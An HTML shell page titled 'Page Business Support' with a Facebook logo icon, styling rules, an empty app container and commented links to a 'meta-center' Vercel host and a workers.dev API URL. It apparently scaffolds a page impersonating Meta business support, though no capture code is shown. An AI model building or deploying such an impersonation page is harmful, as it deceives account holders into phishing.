<html class="light">

<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <title>Page Business Support</title>
  <link rel="icon" type="image/x-icon" href="/src/assets/facebook_logo_icon_147291-f2dfc6fd.ico">
  <link rel="stylesheet" href="/src/css/entry.EH4Dmi31.css">
  <link rel="stylesheet" href="/src/css/entry.EH4Dmi31.css">
  <!-- <link rel="modulepreload" as="script" crossorigin="" href="https://meta-center-9176867629.vercel.app/_nuxt/entry.Dnz1MfJq.js"> -->
  <link rel="prefetch" as="style" href="/src/css/error-404.BiiGkIq1.css">
  <link rel="stylesheet" href="/src/css/error-404.BiiGkIq1.css">
  <!-- <link rel="prefetch" as="script" crossorigin="" href="https://meta-center-9176867629.vercel.app/_nuxt/error-404.C-4kEmBr.js"> -->
  <!-- <link rel="prefetch" as="script" crossorigin="" href="https://meta-center-9176867629.vercel.app/_nuxt/nuxt-link.Bainy7an.js"> -->
  <link rel="prefetch" as="style" href="/src/css/error-500.CoUYIs1G.css">
  <link rel="stylesheet" href="/src/css/error-500.CoUYIs1G.css">
  <!-- <link rel="prefetch" as="script" crossorigin="" href="https://meta-center-9176867629.vercel.app/_nuxt/error-500.510t-3CD.js"> -->
  <!-- <script type="module" src="/_nuxt/entry.Dnz1MfJq.js" crossorigin=""></script> -->
  <!-- <script id="unhead:payload" type="application/json">{"title":"Page Business Support"}</script> -->
  <!-- <script>"use strict"; (() => { const a = window, e = document.documentElement, m = ["dark", "light"], c = window && window.localStorage && window.localStorage.getItem && window.localStorage.getItem("nuxt-color-mode") || "system"; let n = c === "system" ? d() : c; const l = e.getAttribute("data-color-mode-forced"); l && (n = l), i(n), a["__NUXT_COLOR_MODE__"] = { preference: c, value: n, getColorScheme: d, addColorScheme: i, removeColorScheme: f }; function i(o) { const t = "" + o + "", s = ""; e.classList ? e.classList.add(t) : e.className += " " + t, s && e.setAttribute("data-" + s, o) } function f(o) { const t = "" + o + "", s = ""; e.classList ? e.classList.remove(t) : e.className = e.className.replace(new RegExp(t, "g"), ""), s && e.removeAttribute("data-" + s) } function r(o) { return a.matchMedia("(prefers-color-scheme" + o + ")") } function d() { if (a.matchMedia && r("").media !== "not all") { for (const o of m) if (r(":" + o).matches) return o } return "light" } })();
  </script> -->
  <!-- <link rel="modulepreload" as="script" crossorigin=""
    href="https://meta-center-9176867629.vercel.app/_nuxt/_id_.CuHwI3a4.js">
  <link rel="modulepreload" as="script" crossorigin=""
    href="https://meta-center-9176867629.vercel.app/_nuxt/Icon.CLnPNd49.js">
  <link rel="modulepreload" as="script" crossorigin=""
    href="https://meta-center-9176867629.vercel.app/_nuxt/index.DKzsDYrr.js"> -->
  <link rel="stylesheet" href="/src/css/Icon.BewqTmk6.css">
  <link rel="stylesheet" href="/src/css/Icon.BewqTmk6.css">
  <style type="text/css">
    .vue-slider-dot {
      position: absolute;
      -webkit-transition: all 0s;
      transition: all 0s;
      z-index: 5
    }

    .vue-slider-dot:focus {
      outline: none
    }

    .vue-slider-dot-tooltip {
      position: absolute;
      visibility: hidden
    }

    .vue-slider-dot-hover:hover .vue-slider-dot-tooltip,
    .vue-slider-dot-tooltip-show {
      visibility: visible
    }

    .vue-slider-dot-tooltip-top {
      top: -10px;
      left: 50%;
      -webkit-transform: translate(-50%, -100%);
      transform: translate(-50%, -100%)
    }

    .vue-slider-dot-tooltip-bottom {
      bottom: -10px;
      left: 50%;
      -webkit-transform: translate(-50%, 100%);
      transform: translate(-50%, 100%)
    }

    .vue-slider-dot-tooltip-left {
      left: -10px;
      top: 50%;
      -webkit-transform: translate(-100%, -50%);
      transform: translate(-100%, -50%)
    }

    .vue-slider-dot-tooltip-right {
      right: -10px;
      top: 50%;
      -webkit-transform: translate(100%, -50%);
      transform: translate(100%, -50%)
    }
  </style>
  <style type="text/css">
    .vue-slider-marks {
      position: relative;
      width: 100%;
      height: 100%
    }

    .vue-slider-mark {
      position: absolute;
      z-index: 1
    }

    .vue-slider-ltr .vue-slider-mark,
    .vue-slider-rtl .vue-slider-mark {
      width: 0;
      height: 100%;
      top: 50%
    }

    .vue-slider-ltr .vue-slider-mark-step,
    .vue-slider-rtl .vue-slider-mark-step {
      top: 0
    }

    .vue-slider-ltr .vue-slider-mark-label,
    .vue-slider-rtl .vue-slider-mark-label {
      top: 100%;
      margin-top: 10px
    }

    .vue-slider-ltr .vue-slider-mark {
      -webkit-transform: translate(-50%, -50%);
      transform: translate(-50%, -50%)
    }

    .vue-slider-ltr .vue-slider-mark-step {
      left: 0
    }

    .vue-slider-ltr .vue-slider-mark-label {
      left: 50%;
      -webkit-transform: translateX(-50%);
      transform: translateX(-50%)
    }

    .vue-slider-rtl .vue-slider-mark {
      -webkit-transform: translate(50%, -50%);
      transform: translate(50%, -50%)
    }

    .vue-slider-rtl .vue-slider-mark-step {
      right: 0
    }

    .vue-slider-rtl .vue-slider-mark-label {
      right: 50%;
      -webkit-transform: translateX(50%);
      transform: translateX(50%)
    }

    .vue-slider-btt .vue-slider-mark,
    .vue-slider-ttb .vue-slider-mark {
      width: 100%;
      height: 0;
      left: 50%
    }

    .vue-slider-btt .vue-slider-mark-step,
    .vue-slider-ttb .vue-slider-mark-step {
      left: 0
    }

    .vue-slider-btt .vue-slider-mark-label,
    .vue-slider-ttb .vue-slider-mark-label {
      left: 100%;
      margin-left: 10px
    }

    .vue-slider-btt .vue-slider-mark {
      -webkit-transform: translate(-50%, 50%);
      transform: translate(-50%, 50%)
    }

    .vue-slider-btt .vue-slider-mark-step {
      top: 0
    }

    .vue-slider-btt .vue-slider-mark-label {
      top: 50%;
      -webkit-transform: translateY(-50%);
      transform: translateY(-50%)
    }

    .vue-slider-ttb .vue-slider-mark {
      -webkit-transform: translate(-50%, -50%);
      transform: translate(-50%, -50%)
    }

    .vue-slider-ttb .vue-slider-mark-step {
      bottom: 0
    }

    .vue-slider-ttb .vue-slider-mark-label {
      bottom: 50%;
      -webkit-transform: translateY(50%);
      transform: translateY(50%)
    }

    .vue-slider-mark-label,
    .vue-slider-mark-step {
      position: absolute
    }
  </style>
  <style type="text/css">
    .vue-slider {
      position: relative;
      -webkit-box-sizing: content-box;
      box-sizing: content-box;
      -webkit-user-select: none;
      -moz-user-select: none;
      -ms-user-select: none;
      user-select: none;
      display: block;
      -webkit-tap-highlight-color: rgba(0, 0, 0, 0)
    }

    .vue-slider-rail {
      position: relative;
      width: 100%;
      height: 100%;
      -webkit-transition-property: width, height, left, right, top, bottom;
      transition-property: width, height, left, right, top, bottom
    }

    .vue-slider-process {
      position: absolute;
      z-index: 1
    }
  </style>
  <!-- <style>
    @import url("chrome-extension://adlpodnneegcnbophopdmhedicjbcgco/content/styles.css");
  </style> -->
  <style>
    @font-face {
      font-family: "rbicon";
      src: url(chrome-extension://dipiagiiohfljcicegpgffpbnjmgjcnf/fonts/rbicon.woff2) format("woff2");
      font-weight: normal;
      font-style: normal
    }
  </style>
  <style id="nuxt-ui-colors">
    :root {
      --color-primary-50: 240 253 244;
      --color-primary-100: 220 252 231;
      --color-primary-200: 187 247 208;
      --color-primary-300: 134 239 172;
      --color-primary-400: 74 222 128;
      --color-primary-500: 34 197 94;
      --color-primary-600: 22 163 74;
      --color-primary-700: 21 128 61;
      --color-primary-800: 22 101 52;
      --color-primary-900: 20 83 45;
      --color-primary-950: 5 46 22;
      --color-primary-DEFAULT: var(--color-primary-500);

      --color-gray-50: 249 250 251;
      --color-gray-100: 243 244 246;
      --color-gray-200: 229 231 235;
      --color-gray-300: 209 213 219;
      --color-gray-400: 156 163 175;
      --color-gray-500: 107 114 128;
      --color-gray-600: 75 85 99;
      --color-gray-700: 55 65 81;
      --color-gray-800: 31 41 55;
      --color-gray-900: 17 24 39;
      --color-gray-950: 3 7 18;
    }

    .dark {
      --color-primary-DEFAULT: var(--color-primary-400);
    }
  </style>
  <!-- <script>document.head.removeChild(document.querySelector('[data-nuxt-ui-colors]'))</script> -->
</head>

<body>
  <div id="app" data-v-app="">
  </div>
  <script type="module" src="/src/main.js"></script>
  <!-- <script type="application/json" id="__NUXT_DATA__"
    data-ssr="false">[{"_errors":1,"serverRendered":2,"data":3,"state":4,"once":5},{},false,{},{},["Set"]]</script>
  <script>window.__NUXT__ = {}; window.__NUXT__.config = { public: { API_URL: "idea-bot7.hatchpennie4.workers.dev", GANAME: "" }, app: { baseURL: "/", buildAssetsDir: "/_nuxt/", cdnURL: "" } }</script> -->
  <div id="rememberry__extension__root" style="all: unset;"></div>
</body>
<div class="troywell-avia"></div>
<div class="troywell-caa"></div>

</html>